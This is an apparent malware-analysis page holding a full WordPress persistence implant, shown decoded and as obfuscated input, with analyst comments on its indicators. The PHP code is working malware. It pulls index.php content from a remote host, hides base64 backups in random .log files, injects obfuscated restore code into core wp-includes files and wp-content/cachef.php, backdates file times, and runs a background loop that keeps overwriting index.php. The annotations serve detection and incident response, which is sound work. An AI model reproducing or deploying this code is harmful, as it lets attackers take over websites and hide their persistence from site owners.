PHP Decode
"\x48TT\x50_H\x4fST"<?php header('Access-Control-Allow-Origin:*'); error_reporting(E_ALL..
Decoded Output download
"HTTP_HOST"<?php
// Analyst note: request bootstrap of a script that rewrites WordPress core files.
// No authentication or token check is visible in this listing before the
// file-modifying code further down runs.
// Wildcard CORS header: any origin may read this script's response.
header('Access-Control-Allow-Origin:*');
error_reporting(E_ALL);
// Request-controlled; used in auto_restore_file() as part of the remote ".idx" file name.
$mode = isset($_GET["mode"]) ? $_GET["mode"] : 5;
// Crawler User-Agent string; assigned but not read by any function in the visible listing.
$useragent = "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)";
// Network indicator: remote host that auto_restore_file() fetches index.php content from.
$domain = "http://s.newnday.xyz/";
// Derive the site root by cutting the URL directory (PHP_SELF) out of the
// script's filesystem directory (SCRIPT_FILENAME).
$script_name= $_SERVER["SCRIPT_FILENAME"];
$scriptpath=pathinfo($script_name);
$scrip_dir=$scriptpath['dirname'];
$fullurl=$_SERVER['PHP_SELF'];
$currentpath=pathinfo($fullurl);
$currentdir=$currentpath['dirname'];
if($currentdir=='/' || $currentdir=="\\")
{
$root=$scrip_dir;
}
else
{
$dirinfo=explode($currentdir,$scrip_dir);
$root=$dirinfo[0];
}
// Fall back to DOCUMENT_ROOT when the derivation is empty or contains ".php".
if($root=='' || strpos($root, ".php") !== false )
{
$root=$_SERVER['DOCUMENT_ROOT'];
}
// Discloses the resolved filesystem path in the response body.
echo $root.'<br/>';
// Relative paths used later (e.g. is_dir("wp-includes")) resolve against this directory.
@chdir($root);
$http = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on") ? 'https' : 'http';
$host = $_SERVER["HTTP_HOST"];
// "db" request parameter (GET first, then POST), taken without validation and
// concatenated into the remote URL in auto_restore_file().
if (isset($_GET["db"])) {
$gov = $_GET["db"];
} else if (isset($_POST["db"])) {
$gov = $_POST["db"];
} else {
$gov = '';
}
/**
 * Returns the text with $insertCont added as a new line after the line that
 * holds the first occurrence of $target.
 *
 * Analyst note: not called anywhere in the visible listing. The first statement
 * replaces the $fileCont argument with file_get_contents($filePath), and
 * $filePath is not defined inside this function.
 */
function insertAfterTarget($fileCont, $insertCont, $target)
{
$fileCont = file_get_contents($filePath);
$targetIndex = strpos($fileCont, $target);
if ($targetIndex !== false) {
// Offset of the newline that ends the line containing $target.
$chLineIndex = strpos(substr($fileCont, $targetIndex), "\n") + $targetIndex;
if ($chLineIndex !== false) {
$fileCont = substr($fileCont, 0, $chLineIndex + 1) . $insertCont . "\n" . substr($fileCont, $chLineIndex + 1);
}
}
return $fileCont;
}
/**
 * Returns $fileCont with the line containing the first occurrence of $target removed.
 * Works on the string only; the file-writing code is commented out.
 *
 * Analyst note: not called anywhere in the visible listing.
 */
function delTargetLine($fileCont, $target)
{
//$fileCont = file_get_contents($filePath);
$targetIndex = strpos($fileCont, $target);
if ($targetIndex !== false) {
// Newline before the target line and newline that ends it.
$preChLineIndex = strrpos(substr($fileCont, 0, $targetIndex + 1), "\n");
$AfterChLineIndex = strpos(substr($fileCont, $targetIndex), "\n") + $targetIndex;
if ($preChLineIndex !== false && $AfterChLineIndex !== false) {
$fileCont = substr($fileCont, 0, $preChLineIndex + 1) . substr($fileCont, $AfterChLineIndex + 1);
// $fp = fopen($filePath, "w+");
// fwrite($fp, $result);
// fclose($fp);
}
}
return $fileCont;
}
/**
 * Returns $fileCont with $insertCont added as a new line before the line that
 * holds the last occurrence of $target (strrpos is used, not strpos).
 *
 * Analyst note: not called anywhere in the visible listing.
 */
function insertBeforeTarget($fileCont, $insertCont, $target)
{
$targetIndex = strrpos($fileCont, $target);
if ($targetIndex !== false) {
// Newline that precedes the target line; nothing is inserted if there is none.
$chLineIndex = strrpos(substr($fileCont, 0, $targetIndex), "\n");
if ($chLineIndex !== false) {
$fileCont = substr($fileCont, 0, $chLineIndex + 1) . $insertCont . "\n" . substr($fileCont, $chLineIndex + 1);
}
}
return $fileCont;
}
/**
 * Returns one lowercase letter followed by a number from 0 to 50 that is not yet
 * in $usedStrings, and appends it to that by-reference list.
 * $length is ignored because the loop that used it is commented out.
 *
 * Analyst note: not called anywhere in the visible listing.
 */
function genRandomString($length, &$usedStrings) {
$characters = 'abcdefghijklmnopqrstuvwxyz';
$nummax=50;
$string = '';
// for ($i = 0; $i < $length; $i++) {
// $string .= $characters[mt_rand(0, strlen($characters) - 1)];
// }
$string = $characters[mt_rand(0, strlen($characters) - 1)];
$num=mt_rand(0,$nummax);
$string .=$num;
// Retry by recursion when the value was already handed out.
if (in_array($string, $usedStrings)) {
return genRandomString($length, $usedStrings);
} else {
$usedStrings[] = $string;
return $string;
}
}
/**
 * Obfuscation helper: rewrites every third character of $string (positions 0, 3, 6, ...)
 * as the literal text \xNN (its hex code) and passes the other characters through trim().
 * auto_restore_file() applies it to function names inside the snippet it writes to disk.
 *
 * Analyst note: the output is a string in which only some characters are hex-escaped.
 * The "\x48TT\x50_H\x4fST" prefix shown under "Original Code" on this page has exactly
 * that every-third-character shape, so it is a usable pattern for content scanning.
 */
function strto16($string)
{
$arr1 = str_split($string, 1);
$num=0;
foreach ($arr1 as $akey => $aval) {
if($num%3==0)
{
// "\x" with no hex digits after it stays a literal backslash-x in PHP.
$arr1[$akey] = "\x" . bin2hex($aval);
}
else
{
$arr1[$akey] =trim($aval);
}
$num=$num+1;
}
$arr1str=implode('',$arr1);
return $arr1str;
}
/**
 * Fetches $url: through urla() (cURL) when the string contains "http" anywhere,
 * otherwise through file_get_contents().
 * Called by auto_restore_file() with a URL built from $domain and request parameters.
 */
function getx($url)
{
if (stripos($url, 'http') !== false) {
$content = urla($url);
} else {
$content = file_get_contents($url);
}
return $content;
}
/**
 * cURL fetch that follows redirects and accepts gzip/deflate. Sends a POST when
 * $postdata is a non-empty array and extra headers when $header is a non-empty array.
 * Returns the curl_exec() result.
 *
 * Analyst note: no timeout is set here, and the certificate-verification options are
 * switched off only when the URL does not contain "https:".
 */
function urla($url, $header = null, $postdata = null)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate');
if (stripos($url, "https:") === false) {
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
}
if (is_array($header) && !empty($header)) {
curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
}
if (is_array($postdata) && !empty($postdata)) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
}
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$body = curl_exec($ch);
curl_close($ch);
return $body;
}
/**
 * Self-check probe. hiddenma() calls it with "<scheme>://<host>/?ginfo", i.e. the
 * front page of the site this script runs on.
 * Returns true only when the response contains "ok" together with "createseo.xyz"
 * or "fortuneday.xyz".
 *
 * Analyst note: indicators are requests for "/?ginfo" with the header
 * "User-Agent: googlebot" and the two domain strings in a page response.
 * Certificate verification is disabled for this request.
 */
function gfiocheck($url)
{
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE); // https hosts
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
curl_setopt($curl, CURLOPT_HTTPHEADER, array(
'Content-Type: application/json; charset=utf-8',
'User-Agent: googlebot'
));
$data = curl_exec($curl);
if(strpos($data,'ok') !== false && ( strpos($data,'createseo.xyz') !== false || strpos($data,'fortuneday.xyz') !== false )){
return true;
}
else
{
return false;
}
}
/**
 * Analyst note: core persistence routine. It snapshots the site's index.php, stores
 * base64 copies of it in randomly named ".log" files, and plants a restore snippet
 * (delimited by "//c_start" and "//c_end") in wp-content/cachef.php and in wp-includes
 * files. The snippet rewrites index.php from the backup whenever a modified file is loaded.
 *
 * Reads the globals $fp2 (candidate directories), $root, $gov, $mode and $domain.
 *
 * Content signatures visible in the planted snippet: the "//c_start" / "//c_end" markers
 * and the split strings 'DOCUME' . 'NT_ROOT' and 'fil' . 'e_p' . 'ut_' . 'con' . 'ten' . 'ts'.
 *
 * @return array Status strings for each write attempt.
 */
function auto_restore_file()
{
global $fp2, $root,$gov,$mode,$domain,$http,$host;
$index_path = $root . '/index.php';
$auto_restore_staus=1;
$arr_msg = array();
// Text of a stock WordPress index.php; appended after remotely fetched content below.
$inde_content_hou="<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );";
// Snapshot whatever index.php currently holds; this listing does not show how it got there.
$index_content = @file_get_contents($index_path);
if(!$index_content)
{
// No local content: fetch "<domain><db>/<db>.<mode>.idx" from the remote host.
// Both variable parts come straight from request parameters.
$index_content = getx($domain . $gov . '/' . $gov . '.' . $mode . '.idx');
if($index_content)
{
$index_content=$index_content."\n".$inde_content_hou;
}
else
{
$auto_restore_staus=0;
}
}
if($auto_restore_staus)
{
$index_size = strlen($index_content);
$b64_index_content = base64_encode($index_content);
$wordpress_include_path = $root . '/wp-includes/';
// wp-includes file => text of a function declaration used as the injection point.
// Triage list: diff these files against a clean copy of the same WordPress release.
$arr_wordpress_filename = array(
// 'blocks.php' => 'function register_block_style_handle',
'theme.php' => 'function validate_current_theme',
//'template.php' => 'function get_archive_template',
//'rewrite.php' => 'function url_to_postid',
'admin-bar.php' => 'function wp_admin_bar_my_account_menu',
'rest-api.php' => 'function register_rest_field',
'media.php' => 'function image_downsize',
//'nav-menu.php' => 'function is_nav_menu_item',
//'theme-templates.php' => 'function wp_enable_block_templates',
'block-template.php' => 'function _strip_template_file_suffix',
'blocks/archives.php' => 'function render_block_core_archives',
'category.php' => 'function get_cat_name',
'load.php' => 'function is_wp_error',
'plugin.php' => 'function do_action_ref_array',
'query.php' => 'function is_front_page',
'cron.php' => 'function wp_schedule_event',
);
// 10 of the 11 active entries are chosen at random, so the set of touched files varies.
$arr_rand_wordpress_filename = array_rand($arr_wordpress_filename, 10);
// Snippet that gets planted. When the global $gov is empty and the backup file exists,
// it makes index.php writable (0644), overwrites it with the base64-decoded backup and
// sets it read-only (0444). Function names are held in variables or split into pieces.
$hidden_code_template ="//c_start
\$f_exists =\"file_exists\"; \$ch = \"chmod\"; \$tou = \"touch\";
\$delete ='un'.'link';\$f_put = 'fil' . 'e_p' . 'ut_' . 'con' . 'ten' . 'ts';
\$f_get = 'fil' . 'e_g' . 'et_' . 'con' . 'ten' . 'ts';
global \$gov;if (!\$gov) {
\$bs_dec = \"base64_decode\"; \$idx_path = \$_SERVER['DOCUME' . 'NT_ROOT']. '/ind' . 'ex.php'; \$bk_idx_path = '#bk_idx_path#'; if (\$f_exists(\$bk_idx_path)){
@\$ch(\$idx_path, 0644); \$idx_code=\$f_get(\$bk_idx_path); \$f_result=\$f_put(\$idx_path,\$bs_dec(\$idx_code));@\$ch(\$idx_path, 0444); }
}
//c_end"."\n";
$wordpress_content_path = $root . '/wp-content/';
// File indicator: wp-content/cachef.php receives a copy of the snippet.
$wordpress_content_cache= $root . '/wp-content/cachef.php';
// Backup name = a directory from $fp2 directly followed by five random letters and
// ".log" (no "/" is inserted), relative to the current directory. The content is one
// base64 blob of index.php, so hunt for .log files that decode to PHP source.
$bk_index_path = $fp2[array_rand($fp2, 1)] . rand_abc(5) . '.log';
@file_put_contents($bk_index_path, $b64_index_content);
$new_content1='';
$bk_index_path1=$root.'/'.$bk_index_path;
$hidden_code=str_replace('#bk_idx_path#',$bk_index_path1,$hidden_code_template);
$hidden_code=str_replace('#idx_size#',$index_size,$hidden_code);
// Function names that appear literally in the snippet are rewritten into partially
// hex-escaped text by strto16() for the cachef.php copy.
$hidden_code= preg_replace("/file_put_contents/",strto16('file_put_contents'),$hidden_code);
$hidden_code= preg_replace("/file_get_contents/",strto16('file_get_contents'),$hidden_code);
$hidden_code= preg_replace("/file_exists/",strto16('file_exists'),$hidden_code);
$hidden_code= preg_replace("/filesize/",strto16('filesize'),$hidden_code);
$hidden_code= preg_replace("/chmod/",strto16('chmod'),$hidden_code);
$hidden_code= preg_replace("/touch/",strto16('touch'),$hidden_code);
$putcache=@file_put_contents( $wordpress_content_cache, '<?php '.$hidden_code.' ?>');
if (!$putcache)
{
$arr_msg[] = 'modify file '.$wordpress_content_cache.' file fail.';
}
else
{
$arr_msg[] = 'modify file '.$wordpress_content_cache.' file success.';
// Timestomping: the modification time is set 260 days into the past, so searches
// for recently changed files will not list cachef.php.
@touch($wordpress_content_cache, strtotime("-260 days", time()));
}
foreach ($arr_rand_wordpress_filename as $key => $wordpress_filename) {
$needle = $arr_wordpress_filename[$wordpress_filename];
$wordpress_filepath = $wordpress_include_path . $wordpress_filename;
if (!file_exists($wordpress_filepath)) {
continue;
}
$old_content = file_get_contents($wordpress_filepath);
// A further base64 backup of index.php is written for each core file processed.
$bk_index_path3 = $fp2[array_rand($fp2, 1)] . rand_abc(5) . '.log';
@file_put_contents($bk_index_path3, $b64_index_content);
// The placeholders are substituted into the template variable itself.
$hidden_code_template=str_replace("#bk_idx_path#",$bk_index_path3,$hidden_code_template);
$hidden_code_template=str_replace("#idx_size#",$index_size,$hidden_code_template);
$hidden_code_template=str_replace("#indexbase64#",$b64_index_content,$hidden_code_template);
// $new_content is computed but never written; $new_content1 is what reaches disk.
$new_content = str_replace($needle, $hidden_code . $needle, $old_content);
$new_content1=str_replace($needle, $hidden_code_template ."\n". $needle, $old_content);
// 438 decimal = 0666. The file is deleted and recreated, then touch() sets its
// modification time to the previous ctime. Timestamps are therefore unreliable here;
// compare file hashes against a clean WordPress release instead.
$fileoldtime=filectime($wordpress_filepath);
@chmod($wordpress_filepath, 438);
@unlink($wordpress_filepath);
$success = @file_put_contents($wordpress_filepath, $new_content1);
touch($wordpress_filepath,$fileoldtime);
$arr_msg[] = 'hide code: ' . $wordpress_filepath . ' ' . ($success ? 'success' : 'fail');
}
}
else
{
$arr_msg[] ='hide code fail';
}
return $arr_msg;
}
/**
 * Analyst note: strips earlier injected blocks from wp-includes files. hiddenma() runs
 * it immediately before auto_restore_file() plants new ones.
 *
 * Marker strings handled here, all usable as content signatures when scanning
 * wp-includes: "// cyborg_start" ... "// cyborg_end", "//c_start" ... "//c_end", and
 * "i = 'inde'.'x.php';" in pluggable.php and cron.php.
 *
 * @return array Status strings for the "//c_start" removals and the two cleancroncode() calls.
 */
function crack_auto_restore()
{
global $root;
// Only the file names are used below; the function-name values are not read here.
$arr_wordpress_filename = array(
'blocks.php' => 'function register_block_style_handle',
'theme.php' => 'function validate_current_theme',
'template.php' => 'function get_archive_template',
'rewrite.php' => 'function url_to_postid',
'admin-bar.php' => 'function wp_admin_bar_my_account_menu',
'rest-api.php' => 'function register_rest_field',
'media.php' => 'function image_downsize',
'nav-menu.php' => 'function is_nav_menu_item',
'theme-templates.php' => 'function wp_enable_block_templates',
'block-template.php' => 'function _strip_template_file_suffix',
'blocks/archives.php' => 'function render_block_core_archives',
'category.php' => 'function get_cat_name',
'load.php' => 'function is_wp_error',
'plugin.php' => 'function do_action_ref_array',
'query.php' => 'function is_front_page',
'cron.php' => 'function wp_schedule_event',
);
$wordpress_include_path = $root . '/wp-includes/';
$arr_msg = array();
// Pass 1: remove blocks between the "// cyborg_start" and "// cyborg_end" markers.
foreach ($arr_wordpress_filename as $wordpress_filename => $needle) {
$wordpress_filepath = $wordpress_include_path . $wordpress_filename;
if (!file_exists($wordpress_filepath)) {
continue;
}
$old_content = @file_get_contents($wordpress_filepath);
if (preg_match('/\/\/ cyborg_start[\s\S]*?\/\/ cyborg_end/', $old_content)) {
$new_content = preg_replace('/\/\/ cyborg_start[\s\S]*?\/\/ cyborg_end/', '', $old_content);
file_put_contents($wordpress_filepath, $new_content);
// Logged into $arr_logs, which is never returned or printed.
$arr_logs[] = 'delete hidden code: ' . $wordpress_filepath;
}
}
// Pass 2: remove blocks between the "//c_start" and "//c_end" markers.
foreach ($arr_wordpress_filename as $wordpress_filename => $needle) {
$wordpress_filepath = $wordpress_include_path . $wordpress_filename;
if (!file_exists($wordpress_filepath)) {
continue;
}
$old_content = file_get_contents($wordpress_filepath);
if (preg_match('/\/\/c_start[\s\S]*?\/\/c_end/', $old_content)) {
$new_content = preg_replace('/\/\/c_start[\s\S]*?\/\/c_end/', '', $old_content);
$success = @file_put_contents($wordpress_filepath, $new_content);
$arr_msg[] = 'crack restore: ' . $wordpress_filepath . ' ' . ($success ? 'success' : 'fail');
}
}
// if (file_exists('wp-includes/fonts/dashicons.ttc')) {
// @unlink('wp-includes/fonts/dashicons.ttc');
// $arr_msg[] = "delete ttc ok";
// }
// if (file_exists('wp-admin/images/browser-tiny.png')) {
// @unlink('wp-admin/images/browser-tiny.png');
// $arr_msg[] = "delete png ok";
// }
// Cut a block that starts at "i = 'inde'.'x.php';" out of pluggable.php and cron.php.
$arr_msg[] = "pluggable " . cleancroncode($root.'/wp-includes/pluggable.php', "i = 'inde'.'x.php';", "if ( ! function_exists( 'wp_set_auth_cookie'");
$arr_msg[] = "cron " . cleancroncode($root.'/wp-includes/cron.php', "i = 'inde'.'x.php';", "function wp_get_schedules() {");
return $arr_msg;
}
/**
 * Rewrites $file without the text that runs from one byte before the first occurrence
 * of $startstr up to (not including) the first occurrence of $endstr.
 * Returns 'clear cron code' when $startstr was found, otherwise 'cron no code'.
 *
 * Analyst note: the result of the $endstr search is used without a check, and the
 * file is overwritten in place with no backup.
 */
function cleancroncode($file, $startstr, $endstr)
{
$msg = 'cron no code';
if (file_exists($file)) {
$ma = file_get_contents($file);
$start = strpos($ma, $startstr);
if ($start !== false) {
// Keep everything before the marker (minus one byte) and everything from $endstr on.
$head = substr($ma, 0, $start - 1);
$end = strpos($ma, $endstr);
$foot = substr($ma, $end);
file_put_contents($file, $head . $foot);
$msg = 'clear cron code';
} else {
$msg = 'cron no code';
}
}
return $msg;
}
/**
 * Rewrites $file so that $src plus a newline precedes every occurrence of $beforetag,
 * and returns a "line of <file> ok" / "line of <file> fail" message.
 *
 * Analyst note: not called anywhere in the visible listing.
 */
function insertcroncode($file, $src, $beforetag)
{
// code
$c = file_get_contents($file);
$pn = file_put_contents($file, str_replace($beforetag, $src . "\n" . $beforetag, $c));
if ($pn) {
$msg = "line of $file ok";
} else {
$msg = "line of $file fail";
}
return $msg;
}
/**
 * Prints the run report: JSON when $message_type is anything other than 'html',
 * otherwise one <$html_tag> element per message with "success", " ok" and "fail"
 * wrapped in coloured <font> tags.
 *
 * Analyst note: the messages contain absolute paths of the files that were modified
 * and are echoed without HTML escaping. A captured response body therefore lists
 * what this run touched.
 */
function output_message($result, $message_type = 'html', $html_tag = 'li')
{
if ($message_type != 'html') {
echo json_encode($result);
return;
}
if (!is_array($result)) {
return;
}
if (!isset($result['title'])) {
$result['title'] = '';
}
// Response-body signature: "---------start <title>" ... "---------end <title>===>status:".
echo '---------start ' . $result['title'];
if (sizeof($result['message']) > 0) {
foreach ($result['message'] as $message) {
$message = str_replace('success', '<font color="blue">success</font>', $message);
$message = str_replace(' ok', '<font color="blue"> ok</font>', $message);
$message = str_replace('fail', '<font color="red">fail</font>', $message);
echo "<$html_tag>" . $message . "</$html_tag>";
}
}
if (isset($result['status']) && !empty($result['status'])) {
if ($result['status'] == 'ok') {
$status = '<font color="green">' . $result['status'] . '</font>';
}
if ($result['status'] == 'fail') {
$status = '<font color="red">' . $result['status'] . '</font>';
}
echo '---------end ' . $result['title'] . '===>status:' . $status;
} else {
// No status supplied: report "ok".
$status = '<font color="green">ok</font>';
echo '---------end ' . $result['title'] . '===>status:' . $status;
}
echo "<br />";
echo "<br />";
}
/**
 * Walks the directory tree under $path and appends to the global $arpath8 every
 * directory (path relative to $root, symlinks skipped) that has no index.php of its own.
 * Recursion continues only while the relative path holds fewer than three "/".
 * The list is shuffled at the end of every call.
 *
 * Analyst note: this builds the pool of locations from which auto_restore_file()
 * later picks places for its backup ".log" files (after filtering by fp2()).
 */
function fi1($path)
{
global $root, $arpath8;
if ($handle = opendir($path)) {
while (($file = readdir($handle)) !== false) {
if ($file != "." && $file != "..") {
$pfile = $path . "/" . $file;
if (is_dir($pfile) && !is_link($pfile)) {
// Depth limit on the recursion.
if (substr_count(str_replace($root . '/', '', $pfile), '/') < 3) {
fi1($pfile);
}
if (!file_exists($pfile . "/index.php")) {
array_push($arpath8, str_replace($root . '/', '', $pfile));
}
}
}
}
}
shuffle($arpath8);
}
/**
 * Returns the entries of the global $arpath8 that have at least three "/"-separated
 * segments once $root is removed from them.
 * The caller stores the result in $fp2, which auto_restore_file() uses as the pool of
 * directories for its backup ".log" files.
 * Note that the parameter and a global share the name $root.
 */
function fp2($root)
{
global $root, $http, $host, $domain, $ht, $gov, $arpath8;
$p_arr = array();
$pnew_arr = array();
foreach ($arpath8 as $k => $v) {
$qupath = str_replace($root, "", $v);
$p_arr[$k] = explode("/", $qupath);
// Keep only paths that are at least three segments deep.
if (count($p_arr[$k]) >= 3) {
$pnew_arr[] = $v;
}
}
return $pnew_arr;
}
/**
 * Returns $length characters taken from a shuffled a-z/A-Z alphabet; the alphabet is
 * doubled until it is at least $length characters long.
 * auto_restore_file() calls it with 5 to name its backup ".log" files.
 */
function rand_abc($length)
{
$str = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
$strlen = 52;
while ($length > $strlen) {
$str .= $str;
$strlen += 52;
}
$str = str_shuffle($str);
return substr($str, 0, $length);
}
/**
 * Fire-and-forget GET of $url with the given timeout. Peer and peer-name verification
 * are disabled, errors are suppressed and the response is discarded.
 * auto_restore_cycle() uses it to trigger the temporary script it has just written.
 */
function file_get_https($url, $timeout)
{
$arrContextOptions = array(
"ssl" => array(
"verify_peer" => false,
"verify_peer_name" => false,
),
'http' => array(
'method' => "GET",
'timeout' => $timeout,
),
);
@file_get_contents($url, false, stream_context_create($arrContextOptions));
}
/**
 * Analyst note: starts a long-running watcher that keeps index.php at its current content.
 *
 * The function writes cyborg_tmp.php into the document root, requests it once over HTTP
 * (3 second timeout) and then deletes the file. The loop keeps running in the PHP process
 * that served that request, so no script remains on disk.
 *
 * The generated script removes the time limit (99 - 99 = 0), ignores client disconnects,
 * answers "888" and closes the connection. It then remembers index.php's content and,
 * every 2 seconds, recreates index.php with mode 292 (0444) if it is missing or differs.
 * The loop ends when a file named 3FNDICU2KH exists in the document root; any such file
 * is deleted once when the loop starts.
 *
 * Incident response: while such a process is alive, a cleaned index.php is overwritten
 * again within seconds, so find and stop long-lived PHP workers before restoring files.
 * Indicators: requests for /cyborg_tmp.php, a response body of "888", the flag file name.
 *
 * @return array Status strings for the write, the trigger request and the delete.
 */
function auto_restore_cycle()
{
$arr_msg = array();
$code ="<?php set_time_limit(99 - 99);
ignore_user_abort(1);
function auto_restore_memory()
{
\$index_path = \$_SERVER['DOCUMENT_ROOT'] . '/index.php';
\$flag_filename = \$_SERVER['DOCUMENT_ROOT'] . '/3FNDICU2KH';
@unlink(\$flag_filename);
\$index_code = @file_get_contents(\$index_path);
while (1) {
clearstatcache();
if (file_exists(\$flag_filename)){
break;
}
if (!file_exists(\$index_path) or @file_get_contents(\$index_path) != \$index_code) {
@chmod(\$index_path, 438);
@unlink(\$index_path);
@file_put_contents(\$index_path, \$index_code);
@chmod(\$index_path, 292);
}
sleep(2);
}
}
ob_end_clean();
header(\"Connection: close\");
ob_start();
echo 888;
header(\"Content-Length: \" . ob_get_length());
ob_end_flush();
flush();
auto_restore_memory(); ?>";
// File indicator: cyborg_tmp.php in the document root (short-lived).
$file_path = $_SERVER['DOCUMENT_ROOT'] . '/' . 'cyborg_tmp.php';
$success = @file_put_contents($file_path, $code);
$arr_msg[] = 'write tmp file: ' . $file_path . ' ' . ($success ? 'success' : 'fail');
if (!$success) {
return $arr_msg;
}
// Turn the filesystem path into a URL on this host and request it once.
$protocol = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on") ? 'https' : 'http';
$file_url = str_replace($_SERVER['DOCUMENT_ROOT'], $protocol . '://' . $_SERVER['HTTP_HOST'], $file_path);
file_get_https($file_url, 3);
// Logged as "ok" regardless of the outcome; file_get_https() returns nothing.
$arr_msg[] = 'get: ' . $file_url . ' ok';
$success = @unlink($file_path);
$arr_msg[] = 'delete: ' . $file_path . ' ' . ($success ? 'success' : 'fail');
return $arr_msg;
}
/**
 * Orchestrator. When the current directory looks like a WordPress root (wp-includes and
 * wp-admin both exist), it runs, in order: crack_auto_restore() (remove earlier injected
 * blocks), auto_restore_file() (plant backups and restore snippets), gfiocheck() on
 * "<scheme>://<host>/?ginfo", and auto_restore_cycle() (start the index.php watcher).
 *
 * Analyst note: the commented-out lines show that an earlier revision also called an
 * adduser() helper; that helper is not defined in the visible listing.
 *
 * @return array 'title' (this function's name) and, when anything ran, 'message' (list of status strings).
 */
function hiddenma()
{
global $root, $http, $host, $ht, $gov, $sitemap_code_file, $oneline, $mode, $domain,$fsize;
$return_result = array();
$return_result['title'] = __FUNCTION__;
if (is_dir("wp-includes") && is_dir("wp-admin")) {
// if (file_exists("wp-config.php")) {
// $return_result['message'][] = adduser('wp-blog', '$P$BFHUiQbVj3FJKfYu/xB/LTghBaAXLe1', true);
// $return_result['message'][] = adduser('wp-user', '1bc83cec427917671aef3f1c63c150f9', false);
// }
$arr_msg = crack_auto_restore();
foreach ($arr_msg as $key => $msg) {
$return_result['message'][] = $msg;
}
$arr_msg = auto_restore_file();
foreach ($arr_msg as $key => $msg) {
$return_result['message'][] = $msg;
}
// $wcc_file=@file_get_contents($_SERVER['DOCUMENT_ROOT'].'/wp-content/cachef'));
// Self-check: request the site's own front page with the "ginfo" query string.
$check_ginfo_url=$http.'://'.$host.'/?ginfo';
$check_staus=gfiocheck($check_ginfo_url);
if($check_staus)
{
$return_result['message'][] = 'ginfo:ok';
}
$arr_msg = auto_restore_cycle();
foreach ($arr_msg as $key => $msg) {
$return_result['message'][] = $msg;
}
}
return $return_result;
}
// Entry point. The report format comes from the POST field "message_type";
// any value other than 'html' makes output_message() emit JSON.
if (isset($_POST['message_type']) && !empty($_POST['message_type'])) {
$message_type = $_POST['message_type'];
} else {
$message_type = 'html';
}
$useragent = "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)";
// Network indicator (same value as at the top of the script).
$domain = "http://s.newnday.xyz/";
// $root is reset to DOCUMENT_ROOT here, replacing the value derived at the top of the script.
$root = $_SERVER['DOCUMENT_ROOT'];
@chdir($root);
$http = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on") ? 'https' : 'http';
$host = $_SERVER["HTTP_HOST"];
// Build the pool of directories used for the backup ".log" files.
$arpath8 = array();
fi1($root);
$fp2 = @fp2($root);
// WordPress-style rewrite rules; assigned but not read by any code in the visible listing.
$ht =
'
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
';
// Every request to this script runs the whole chain; no precondition is checked first.
$hiddenma_result = hiddenma(); // 4
output_message($hiddenma_result, $message_type);
?>
Original Code
"\x48TT\x50_H\x4fST"<?php
// Analyst note: this is the sample as submitted, before decoding. No authentication or
// token check is visible in this listing before the file-modifying code further down runs.
// Wildcard CORS header: any origin may read this script's response.
header('Access-Control-Allow-Origin:*');
error_reporting(E_ALL);
// Request-controlled; used in auto_restore_file() as part of the remote ".idx" file name.
$mode = isset($_GET["mode"]) ? $_GET["mode"] : 5;
// Crawler User-Agent string; assigned but not read by any function in the visible listing.
$useragent = "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)";
// Network indicator written entirely as \xNN escapes, so the host name never appears in
// plain text in the file on disk. It decodes to http://s.newnday.xyz/ (as shown in the
// decoded listing on this page); a plain-text search for the domain will miss this line.
$domain = "\x68\x74\x74\x70\x3a\x2f\x2f\x73\x2e\x6e\x65\x77\x6e\x64\x61\x79\x2e\x78\x79\x7a\x2f";
// Derive the site root by cutting the URL directory (PHP_SELF) out of the
// script's filesystem directory (SCRIPT_FILENAME).
$script_name= $_SERVER["SCRIPT_FILENAME"];
$scriptpath=pathinfo($script_name);
$scrip_dir=$scriptpath['dirname'];
$fullurl=$_SERVER['PHP_SELF'];
$currentpath=pathinfo($fullurl);
$currentdir=$currentpath['dirname'];
if($currentdir=='/' || $currentdir=="\\")
{
$root=$scrip_dir;
}
else
{
$dirinfo=explode($currentdir,$scrip_dir);
$root=$dirinfo[0];
}
// Fall back to DOCUMENT_ROOT when the derivation is empty or contains ".php".
if($root=='' || strpos($root, ".php") !== false )
{
$root=$_SERVER['DOCUMENT_ROOT'];
}
// Discloses the resolved filesystem path in the response body.
echo $root.'<br/>';
@chdir($root);
$http = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on") ? 'https' : 'http';
$host = $_SERVER["HTTP_HOST"];
// "db" request parameter (GET first, then POST), taken without validation and
// concatenated into the remote URL in auto_restore_file().
if (isset($_GET["db"])) {
$gov = $_GET["db"];
} else if (isset($_POST["db"])) {
$gov = $_POST["db"];
} else {
$gov = '';
}
/**
